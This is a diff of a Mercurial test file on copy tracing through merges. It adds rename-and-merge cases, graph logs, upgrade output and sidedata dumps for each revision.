+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mAE-change,Km: $case_desc"
+
+(merge variant 2)
+
+ $ hg up 'desc("k-1")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+ $ hg merge 'desc("mAE-change-m")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mK,AE-change-m: $case_desc"
+ created new head
+
+(merge variant 3)
+
+ $ hg up 'desc("mEA-change-m")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("j-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mEA-change,Jm: $case_desc"
+
+(merge variant 4)
+
+ $ hg up 'desc("j-1")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("mEA-change-m")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mJ,EA-change-m: $case_desc"
+ created new head
+
+
+ $ hg log -G --rev '::(desc("mAE-change,Km") + desc("mK,AE-change-m") + desc("mEA-change,Jm") + desc("mJ,EA-change-m"))'
+ @ mJ,EA-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ |\
+ +---o mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ | |/
+ | | o mK,AE-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ | | |\
+ | | +---o mAE-change,Km: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ | | | |/
+ | | | o k-1: unrelated changes (based on "e" changes)
+ | | | |
+ | o | | j-1: unrelated changes (based on the "a" series of changes)
+ | | | |
+ o-----+ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way
+ |/ / /
+ | o / mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way
+ |/|/
+ | o e-2 g -move-> f
+ | |
+ | o e-1 b -move-> g
+ | |
+ o | a-2: e -move-> f
+ | |
+ o | a-1: d -move-> e
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
Summary of all created cases
----------------------------
@@ -650,31 +1537,74 @@
f-2: rename i -> d
g-1: update d
h-1: b -(move)-> d
- i-0 initial commit: a b h
- i-1: a -move-> c
- i-2: c -move-> d
- mABm-0 simple merge - the other way
- mAEm-0 simple merge - one way
- mBAm-0 simple merge - one way
- mBC-revert-m-0
- mBCm-0 simple merge - one way
+ i-0 initial commit: a b h p q r
+ i-1: a -move-> c, p -move-> s
+ i-2: c -move-> d, s -move-> t
+ j-1: unrelated changes (based on the "a" series of changes)
+ k-1: unrelated changes (based on "e" changes)
+ l-1: unrelated changes (based on "c" changes)
+ mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way
+ mAE,Km: chained merges (conflict -> simple) - same content everywhere
+ mAE-change,Km: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way
+ mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way
+ mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way
+ mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists)
+ mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
+ mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
+ mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way
mBCm-1 re-add d
- mBDm-0 simple merge - one way
- mBFm-0 simple merge - one way
- mCB-revert-m-0
- mCBm-0 simple merge - the other way
+ mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way
+ mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
+ mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
+ mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way
+ mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists)
+ mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
+ mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
+ mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way
mCBm-1 re-add d
- mCGm-0
- mCH-delete-before-conflict-m-0
- mDBm-0 simple merge - the other way
- mDGm-0 simple merge - one way
- mEAm-0 simple merge - the other way
- mFBm-0 simple merge - the other way
- mFGm-0 simple merge - one way
- mGCm-0
- mGDm-0 simple merge - the other way
- mGFm-0 simple merge - the other way
- mHC-delete-before-conflict-m-0
+ mCGm-0 merge updated/deleted - revive the file (updated content) - one way
+ mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way
+ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way
+ mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
+ mEA,Jm: chained merges (conflict -> simple) - same content everywhere
+ mEA-change,Jm: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way
+ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way
+ mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
+ mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
+ mFG,Om: chained merges (copy-overwrite -> simple) - same content
+ mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way
+ mGCm-0 merge updated/deleted - revive the file (updated content) - the other way
+ mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way
+ mGF,Nm: chained merges (copy-overwrite -> simple) - same content
+ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way
+ mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way
+ mJ,EA-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ mJ,EAm: chained merges (conflict -> simple) - same content everywhere
+ mK,AE-change-m: chained merges (conflict+change -> simple) - same content on both branch in the initial merge
+ mK,AEm: chained merges (conflict -> simple) - same content everywhere
+ mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists)
+ mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists)
+ mN,GFm: chained merges (copy-overwrite -> simple) - same content
+ mO,FGm: chained merges (copy-overwrite -> simple) - same content
+ mPQ,Tm: chained merges (conflict -> simple) - different content
+ mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way
+ mQP,Sm: chained merges (conflict -> simple) - different content
+ mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way
+ mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way
+ mS,QPm: chained merges (conflict -> simple) - different content
+ mT,PQm: chained merges (conflict -> simple) - different content
+ n-1: unrelated changes (based on the "f" series of changes)
+ o-1: unrelated changes (based on "g" changes)
+ p-1: t -move-> u
+ p-2: u -move-> v
+ q-1 r -move-> w
+ q-2 w -move-> v
+ r-1: rename r -> x
+ r-2: rename t -> x
+ s-1: unrelated changes (based on the "p" series of changes)
+ t-1: unrelated changes (based on "q" changes)
Test that sidedata computations during upgrades are correct
@@ -698,9 +1628,10 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no yes no
+ revlog-v2: no yes no
plain-cl-delta: yes yes yes
compression: * (glob)
compression-level: default default default
@@ -709,7 +1640,48 @@
requirements
preserved: * (glob)
- added: exp-copies-sidedata-changeset, exp-sidedata-flag
+ removed: revlogv1
+ added: exp-copies-sidedata-changeset, exp-revlogv2.2, exp-sidedata-flag
+
+ processed revlogs:
+ - all-filelogs
+ - changelog
+ - manifest
+
+#endif
+
+#if upgraded-parallel
+ $ cat >> $HGRCPATH << EOF
+ > [format]
+ > exp-use-side-data = yes
+ > exp-use-copies-side-data-changeset = yes
+ > [experimental]
+ > worker.repository-upgrade=yes
+ > [worker]
+ > enabled=yes
+ > numcpus=8
+ > EOF
+ $ hg debugformat -v
+ format-variant repo config default
+ fncache: yes yes yes
+ dotencode: yes yes yes
+ generaldelta: yes yes yes
+ share-safe: no no no
+ sparserevlog: yes yes yes
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
+ copies-sdc: no yes no
+ revlog-v2: no yes no
+ plain-cl-delta: yes yes yes
+ compression: * (glob)
+ compression-level: default default default
+ $ hg debugupgraderepo --run --quiet
+ upgrade will perform the following actions:
+
+ requirements
+ preserved: * (glob)
+ removed: revlogv1
+ added: exp-copies-sidedata-changeset, exp-revlogv2.2, exp-sidedata-flag
processed revlogs:
- all-filelogs
@@ -721,194 +1693,411 @@
#if no-compatibility no-filelog no-changeset
+ $ hg debugchangedfiles --compute 0
+ added : a, ;
+ added : b, ;
+ added : h, ;
+ added : p, ;
+ added : q, ;
+ added : r, ;
+
$ for rev in `hg log --rev 'all()' -T '{rev}\n'`; do
- > echo "##### revision $rev #####"
+ > case_id=`hg log -r $rev -T '{word(0, desc, ":")}\n'`
+ > echo "##### revision \"$case_id\" #####"
> hg debugsidedata -c -v -- $rev
> hg debugchangedfiles $rev
> done
- ##### revision 0 #####
+ ##### revision "i-0 initial commit" #####
1 sidedata entries
- entry-0014 size 34
- '\x00\x00\x00\x03\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00abh'
+ entry-0014 size 64
+ '\x00\x00\x00\x06\x04\x00\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x02\x00\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x00abhpqr'
added : a, ;
added : b, ;
added : h, ;
- ##### revision 1 #####
+ added : p, ;
+ added : q, ;
+ added : r, ;
+ ##### revision "i-1" #####
1 sidedata entries
- entry-0014 size 24
- '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ac'
+ entry-0014 size 44
+ '\x00\x00\x00\x04\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x02acps'
removed : a, ;
added p1: c, a;
- ##### revision 2 #####
+ removed : p, ;
+ added p1: s, p;
+ ##### revision "i-2" #####
1 sidedata entries
- entry-0014 size 24
- '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00cd'
+ entry-0014 size 44
+ '\x00\x00\x00\x04\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x02cdst'
removed : c, ;
added p1: d, c;
- ##### revision 3 #####
+ removed : s, ;
+ added p1: t, s;
+ ##### revision "a-1" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00de'
removed : d, ;
added p1: e, d;
- ##### revision 4 #####
+ ##### revision "a-2" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00ef'
removed : e, ;
added p1: f, e;
- ##### revision 5 #####
+ ##### revision "b-1" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00b'
touched : b, ;
- ##### revision 6 #####
+ ##### revision "c-1 delete d" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x00\x00\x00\x00d'
removed : d, ;
- ##### revision 7 #####
+ ##### revision "d-1 delete d" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x00\x00\x00\x00d'
removed : d, ;
- ##### revision 8 #####
+ ##### revision "d-2 re-add d" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d'
added : d, ;
- ##### revision 9 #####
+ ##### revision "e-1 b -move-> g" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00bg'
removed : b, ;
added p1: g, b;
- ##### revision 10 #####
+ ##### revision "e-2 g -move-> f" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00fg'
added p1: f, g;
removed : g, ;
- ##### revision 11 #####
+ ##### revision "p-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00tu'
+ removed : t, ;
+ added p1: u, t;
+ ##### revision "p-2" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00uv'
+ removed : u, ;
+ added p1: v, u;
+ ##### revision "q-1 r -move-> w" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00rw'
+ removed : r, ;
+ added p1: w, r;
+ ##### revision "q-2 w -move-> v" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x02\x06\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00vw'
+ added p1: v, w;
+ removed : w, ;
+ ##### revision "mBAm-0 simple merge - A side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 12 #####
+ ##### revision "mABm-0 simple merge - A side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 13 #####
+ ##### revision "mBCm-0 simple merge - C side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 14 #####
+ ##### revision "mBCm-1 re-add d" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d'
added : d, ;
- ##### revision 15 #####
+ ##### revision "mCBm-0 simple merge - C side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 16 #####
+ ##### revision "mCBm-1 re-add d" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x04\x00\x00\x00\x01\x00\x00\x00\x00d'
added : d, ;
- ##### revision 17 #####
+ ##### revision "mBDm-0 simple merge - B side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 18 #####
+ ##### revision "mDBm-0 simple merge - B side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 19 #####
+ ##### revision "mAEm-0 merge with copies info on both side - A side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f'
merged : f, ;
- ##### revision 20 #####
+ ##### revision "mEAm-0 merge with copies info on both side - A side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f'
merged : f, ;
- ##### revision 21 #####
+ ##### revision "mPQm-0 merge with copies info on both side - P side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00v'
+ merged : v, ;
+ ##### revision "mQPm-0 merge with copies info on both side - P side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00v'
+ merged : v, ;
+ ##### revision "f-1" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00hi'
removed : h, ;
added p1: i, h;
- ##### revision 22 #####
+ ##### revision "f-2" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x16\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00di'
touched p1: d, i;
removed : i, ;
- ##### revision 23 #####
+ ##### revision "mBFm-0 simple merge - B side" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mFBm-0 simple merge - B side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 24 #####
+ ##### revision "r-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00rx'
+ removed : r, ;
+ added p1: x, r;
+ ##### revision "r-2" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x02\x16\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00tx'
+ touched p1: t, x;
+ removed : x, ;
+ ##### revision "mBRm-0 simple merge - B side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 25 #####
+ ##### revision "mRBm-0 simple merge - B side" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "g-1" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d'
touched : d, ;
- ##### revision 26 #####
- 1 sidedata entries
- entry-0014 size 14
- '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d'
- merged : d, ;
- ##### revision 27 #####
+ ##### revision "mDGm-0 actual content merge, copies on one side - D side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d'
merged : d, ;
- ##### revision 28 #####
+ ##### revision "mGDm-0 actual content merge, copies on one side - D side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d'
merged : d, ;
- ##### revision 29 #####
+ ##### revision "mFGm-0 merge - G side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d'
merged : d, ;
- ##### revision 30 #####
+ ##### revision "mGFm-0 merge - G side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d'
+ merged : d, ;
+ ##### revision "mCGm-0 merge updated/deleted - revive the file (updated content) - one way" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d'
salvaged : d, ;
- ##### revision 31 #####
+ ##### revision "mGCm-0 merge updated/deleted - revive the file (updated content) - the other way" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d'
salvaged : d, ;
- ##### revision 32 #####
+ ##### revision "mCB-revert-m-0 merge explicitely revive deleted file - B side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d'
salvaged : d, ;
- ##### revision 33 #####
+ ##### revision "mBC-revert-m-0 merge explicitely revive deleted file - B side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d'
salvaged : d, ;
- ##### revision 34 #####
+ ##### revision "h-1" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00bd'
removed : b, ;
added p1: d, b;
- ##### revision 35 #####
+ ##### revision "mCH-delete-before-conflict-m-0 simple merge - C side" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mHC-delete-before-conflict-m-0 simple merge - C side" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mAE-change-m-0 merge with file update and copies info on both side - A side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f'
+ merged : f, ;
+ ##### revision "mEA-change-m-0 merge with file update and copies info on both side - A side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f'
+ merged : f, ;
+ ##### revision "mBF-change-m-0 merge with extra change - B side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d'
+ touched : d, ;
+ ##### revision "mFB-change-m-0 merge with extra change - B side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d'
+ touched : d, ;
+ ##### revision "mCB-change-m-0 merge explicitely revive deleted file - B side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d'
+ salvaged : d, ;
+ ##### revision "mBC-change-m-0 merge explicitely revive deleted file - B side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d'
+ salvaged : d, ;
+ ##### revision "j-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j'
+ added : unrelated-j, ;
+ ##### revision "k-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-k'
+ added : unrelated-k, ;
+ ##### revision "mAE,Km" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mK,AEm" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 36 #####
+ ##### revision "mEA,Jm" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j'
+ touched : unrelated-j, ;
+ ##### revision "mJ,EAm" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j'
+ touched : unrelated-j, ;
+ ##### revision "s-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-s'
+ added : unrelated-s, ;
+ ##### revision "t-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-t'
+ added : unrelated-t, ;
+ ##### revision "mPQ,Tm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mT,PQm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mQP,Sm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mS,QPm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "l-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-l'
+ added : unrelated-l, ;
+ ##### revision "mBC+revert,Lm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mCB+revert,Lm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mL,BC+revertm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mL,CB+revertm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "n-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-n'
+ added : unrelated-n, ;
+ ##### revision "o-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-o'
+ added : unrelated-o, ;
+ ##### revision "mFG,Om" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mO,FGm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mGF,Nm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mN,GFm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mAE-change,Km" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mK,AE-change-m" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mEA-change,Jm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mJ,EA-change-m" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
@@ -927,7 +2116,10 @@
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("a-2")'
A f
a
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("a-2")' f
A f
a (no-changeset no-compatibility !)
@@ -939,21 +2131,21 @@
- unrelated change on the other side
$ hg log -G --rev '::(desc("mABm")+desc("mBAm"))'
- o 12 mABm-0 simple merge - the other way
+ o mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way
|\
- +---o 11 mBAm-0 simple merge - one way
+ +---o mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way
| |/
- | o 5 b-1: b update
+ | o b-1: b update
| |
- o | 4 a-2: e -move-> f
+ o | a-2: e -move-> f
| |
- o | 3 a-1: d -move-> e
+ o | a-1: d -move-> e
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
$ hg status --copies --rev 'desc("b-1")' --rev 'desc("mABm")'
@@ -982,12 +2174,18 @@
M b
A f
a
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBAm")'
M b
A f
a
+ A t
+ p
R a
+ R p
merging with the side having a delete
-------------------------------------
@@ -998,23 +2196,23 @@
and recreate an unrelated file after the merge
$ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))'
- o 16 mCBm-1 re-add d
+ o mCBm-1 re-add d
|
- o 15 mCBm-0 simple merge - the other way
+ o mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way
|\
- | | o 14 mBCm-1 re-add d
+ | | o mBCm-1 re-add d
| | |
- +---o 13 mBCm-0 simple merge - one way
+ +---o mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way
| |/
- | o 6 c-1 delete d
+ | o c-1 delete d
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
- comparing from the merge
@@ -1034,10 +2232,16 @@
R d
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBCm-0")'
M b
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCBm-0")'
M b
+ A t
+ p
R a
+ R p
- comparing with the merge children re-adding the file
@@ -1060,11 +2264,17 @@
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBCm-1")'
M b
A d
+ A t
+ p
R a
+ R p
